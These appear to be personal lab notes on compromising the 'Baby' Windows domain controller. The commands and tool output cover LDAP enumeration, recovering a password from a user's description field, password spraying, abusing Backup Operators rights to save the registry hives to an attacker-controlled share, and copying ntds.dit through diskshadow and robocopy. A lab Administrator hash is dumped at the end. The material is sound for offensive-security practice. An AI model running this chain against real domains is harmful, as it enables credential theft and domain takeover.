Baby

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Windows Server 2022 (Build 20348 x64)

Chain: False (standalone compromise)

Credentials

Username

Password

Method

Scope

Caroline.Robinson

BabyStart123!

LDAP

User description field (Expired Password)

✅ Valid Usernames

jacqueline.barnett
ashley.webb
hugh.george
leonard.dyer
ian.walker
connor.wilkinson
joseph.hughes
kerry.wilson
teresa.bell
caroline.robinson

🔑 Passwords list

BabyStart123!

Enumeration

ICMP Check

ping -c 4 10.10.90.157
PING 10.10.90.157 (10.10.90.157) 56(84) bytes of data.
64 bytes from 10.10.90.157: icmp_seq=1 ttl=127 time=160 ms
64 bytes from 10.10.90.157: icmp_seq=2 ttl=127 time=164 ms
64 bytes from 10.10.90.157: icmp_seq=3 ttl=127 time=159 ms
64 bytes from 10.10.90.157: icmp_seq=4 ttl=127 time=159 ms

--- 10.10.90.157 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3007ms
rtt min/avg/max/mdev = 158.699/160.582/164.422/2.250 ms

Service enumeration

nmap -p- -A --open -T5 -Pn -n -oN ext_baby_tcp_allports -vvv 10.10.90.157
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-04-01 00:34:34Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
5357/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack Microsoft Windows RPC
53720/tcp open  msrpc         syn-ack Microsoft Windows RPC
53735/tcp open  msrpc         syn-ack Microsoft Windows RPC

SMB

Null session allowed ✅
SMB Signing: True
SMBv1: Disabled

Initial Foothold

Identifying Leaked Initial Passwords in the User Description Field

❯ nxc ldap baby.vl -u '' -p '' --users
LDAP        10.10.125.49    389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
LDAP        10.10.125.49    389    BABYDC           [+] baby.vl\: 
LDAP        10.10.125.49    389    BABYDC           [*] Enumerated 9 domain users: baby.vl
LDAP        10.10.125.49    389    BABYDC           -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        10.10.125.49    389    BABYDC           Guest                         <never>             0        Built-in account for guest access to the computer/domain    
LDAP        10.10.125.49    389    BABYDC           Jacqueline.Barnett            2021-11-21 10:11:03 0                                                                    
LDAP        10.10.125.49    389    BABYDC           Ashley.Webb                   2021-11-21 10:11:03 0                                                                    
LDAP        10.10.125.49    389    BABYDC           Hugh.George                   2021-11-21 10:11:03 0                                                                    
LDAP        10.10.125.49    389    BABYDC           Leonard.Dyer                  2021-11-21 10:11:03 0                                                                    
LDAP        10.10.125.49    389    BABYDC           Connor.Wilkinson              2021-11-21 10:11:08 0                                                                    
LDAP        10.10.125.49    389    BABYDC           Joseph.Hughes                 2021-11-21 10:11:08 0                                                                    
LDAP        10.10.125.49    389    BABYDC           Kerry.Wilson                  2021-11-21 10:11:08 0                                                                    
LDAP        10.10.125.49    389    BABYDC           Teresa.Bell                   2021-11-21 10:14:37 6        Set initial password to BabyStart123!

Initial password for users: BabyStart123!

Running a Password Spraying attack

❯ nxc smb 10.10.90.157 -u users -p 'BabyStart123!'
SMB         10.10.90.157    445    BABYDC           [-] baby.vl\caroline.robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

Changing the password caroline.robinson's Password

❯ impacket-changepasswd baby.vl/caroline.robinson:'BabyStart123!'@10.10.90.157
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

New password: 
Retype new password: 
[*] Changing the password of baby.vl\caroline.robinson
[*] Connecting to DCE/RPC as baby.vl\caroline.robinson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.

Compromise Domain Controller

Discovering Caroline.Robinson is member of backup operators group

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /all

User Info

Username: baby\caroline.robinson
Group Membership: Backup Operators

Privileges

SeBackupPrivilege
SeRestorePrivilege
SeMachineAccountPrivilege

Extracting the Registry Hives using impacket toolkit

impacket-reg caroline.robinson:'password123!'@10.10.75.110 save -keyName 'HKLM\SYSTEM' -o '\\10.8.5.48\smbfolder' 2>/dev/null
impacket-reg caroline.robinson:'password123!'@10.10.75.110 save -keyName 'HKLM\SAM' -o '\\10.8.5.48\smbfolder' 2>/dev/null
impacket-reg caroline.robinson:'password123!'@10.10.75.110 save -keyName 'HKLM\Security' -o '\\10.8.5.48\smbfolder' 2>/dev/null

Dumping ntds.dit using Robocopy

set context persistent nowriters
set metadata c:\\windows\\system32\\spool\\drivers\\color\\example.cab
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% w:
end backup

C:\temp> robocopy /B W:\Windows\NTDS c:\temp\ntds.dit ntds.dit

Extracting domain credentials

❯ impacket-secretsdump -sam SAM.save  -ntds ntds.dit -system SYSTEM.save local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
<SNIF>
[*] Cleaning up...

Last updated 6 months ago

hashtagMachine information

hashtagCredentials

hashtagEnumeration

hashtagICMP Check

hashtagService enumeration

hashtagSMB

hashtagInitial Foothold

hashtagIdentifying Leaked Initial Passwords in the User Description Field

hashtagRunning a Password Spraying attack

hashtagChanging the password caroline.robinson's Password

hashtagCompromise Domain Controller

hashtagDiscovering Caroline.Robinson is member of backup operators group

hashtagExtracting the Registry Hives using impacket toolkit

hashtagDumping ntds.dit using Robocopy

hashtagExtracting domain credentials